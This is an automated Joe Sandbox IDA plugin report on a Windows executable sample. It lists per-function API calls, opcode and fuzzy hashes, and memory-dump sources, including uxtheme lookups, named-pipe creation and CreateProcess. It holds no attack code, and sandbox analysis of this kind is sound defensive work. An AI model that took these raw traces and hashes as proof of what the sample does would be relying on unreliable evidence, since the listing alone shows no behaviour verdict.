                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3202724764-0
                                                                          • Opcode ID: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
                                                                          • Instruction ID: 6e8deb3ed7ffb4c54c7bf11bddd21d475954711d807402a63cfbe74293682e9f
                                                                          • Opcode Fuzzy Hash: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
                                                                          • Instruction Fuzzy Hash: 03D05E123812743102107ABB280998B42A84D862AB388043BB54CDB202E91E8A81A1AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID:
                                                                          • API String ID: 530164218-0
                                                                          • Opcode ID: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                          • Instruction ID: a3b20f4c882213fa23ff33249cd178fa67041ba6f44abe22b1f00704e939aabb
                                                                          • Opcode Fuzzy Hash: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                          • Instruction Fuzzy Hash: 4CD05EE27011702BCB01BBED54C4AC667CC8B8829AB1940BBF918EF257C638CE448398
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00450A53,00000000), ref: 0042CC0B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                          • Instruction ID: 3d474633da5dc292dd1e9b08acfa0ea7ef8e6560f0837aa6ac70ccb6d2902417
                                                                          • Opcode Fuzzy Hash: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                          • Instruction Fuzzy Hash: 42C08CE03022001A9A1465BF2CC511F42C8891827A3A41F37F53CE32D2D27E88A72428
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                          • Opcode Fuzzy Hash: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                          • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                          • Opcode Fuzzy Hash: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                          • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                            • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
                                                                          • Instruction ID: c068c6aabe38557252dbc7cfbc7370f277f9ebc01c0ea26a9f887d834500d39f
                                                                          • Opcode Fuzzy Hash: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
                                                                          • Instruction Fuzzy Hash: 2CC04CA130050047DF11A6AED5C190763D89E4D2163544176B504CF217D668D8184A14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                          • Instruction ID: b0804e078831a813d9aa2463563e291fc03c9a68ee142e2bda9a21ea894dad8b
                                                                          • Opcode Fuzzy Hash: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                          • Instruction Fuzzy Hash: AFB09B7670C600DDB709D6D6745552D63D8D7C47207E145B7F001D2580D93C58004928
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                          • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                          • Opcode Fuzzy Hash: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                          • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
                                                                          • Instruction ID: 3d9dac49d769706550815f3fb3cd696203b03cba94e1f0501d82b18e9078b8ff
                                                                          • Opcode Fuzzy Hash: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
                                                                          • Instruction Fuzzy Hash: 7A517770E041499FEB00EFA9C882AAEBBF5EB45314F51416BE504A7351DB389D46CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C020
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                          • Instruction ID: 7372c421533d8f65bf23ff6fb62ce760878112a7f7dadb819c72ada28c104ff7
                                                                          • Opcode Fuzzy Hash: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                          • Instruction Fuzzy Hash: 4C1133716002049BDB10EE59C8C2B5B7794EF8475AF05446AFD589B2C7DB38E809CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                          • Instruction ID: e05957f4d255e36abe150b4c83bb7920b28d063535c27f5b5ffcdbb78f87973e
                                                                          • Opcode Fuzzy Hash: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                          • Instruction Fuzzy Hash: 13114C742407059BC710DF59D880B86FBE5EB99350B10C53BE9688B385D378E946CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001B1C,00005B1F,00401973), ref: 00401766
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 73967e57ec88561925e751cf3b04359846007a52136d561720e1a1017b553e6f
                                                                          • Instruction ID: d642a266e39ce0e7ed3a16981b1f18689788e3c7e0ce9d7f944c9fabc33182c4
                                                                          • Opcode Fuzzy Hash: 73967e57ec88561925e751cf3b04359846007a52136d561720e1a1017b553e6f
                                                                          • Instruction Fuzzy Hash: E90120766443148FC3109F29DCC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,004519B1), ref: 00451993
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                          • Instruction ID: 105945ddca3cabd7714cdb0ae074d91085a40d6b67da20b4593713f233405893
                                                                          • Opcode Fuzzy Hash: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                          • Instruction Fuzzy Hash: 740170756082486F8B00DF699C509EEFBE8EB4D72071083B7FC54D3791D6344D05D668
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,0045C016), ref: 0045BF4F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                          • Instruction ID: 2913e94657538f1a306bb7ed27eed344dd43a6c30afdb59308231f58c8b71720
                                                                          • Opcode Fuzzy Hash: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                          • Instruction Fuzzy Hash: FCD0E9B17557045BDF90EE794C81B0237D8BB48701F5084666908DB286E774E8048E58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                          • Opcode Fuzzy Hash: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0044AE98: GetVersionExA.KERNEL32(00000094), ref: 0044AEB5
                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B05D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B06F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B081
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B093
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B0A5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B0B7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B0C9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B0DB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0ED
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0FF
                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B111
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B123
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B135
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B147
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B159
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B16B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B17D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B18F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B1A1
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B1B3
                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B1C5
                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B1D7
                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1E9
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1FB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B20D
                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B21F
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B231
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B243
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B255
                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B267
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                          • API String ID: 1968650500-2910565190
                                                                          • Opcode ID: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                          • Instruction ID: 3769fa21ef169b5859ff7299002385904a822408566faed309fb3dc54f14a28c
                                                                          • Opcode Fuzzy Hash: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                          • Instruction Fuzzy Hash: 3891C2F0A40B50EBEF00EBF5D886E2A32A8EA56B1471445BBB444EF295D77CC8058F5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00456A3B
                                                                          • QueryPerformanceCounter.KERNEL32(02113858,00000000,00456CCE,?,?,02113858,00000000,?,004573CA,?,02113858,00000000), ref: 00456A44
                                                                          • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00456A4E
                                                                          • GetCurrentProcessId.KERNEL32(?,02113858,00000000,00456CCE,?,?,02113858,00000000,?,004573CA,?,02113858,00000000), ref: 00456A57
                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456ACD
                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 00456ADB
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B23
                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00456C79,?,00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B5C
                                                                            • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C05
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00456C3B
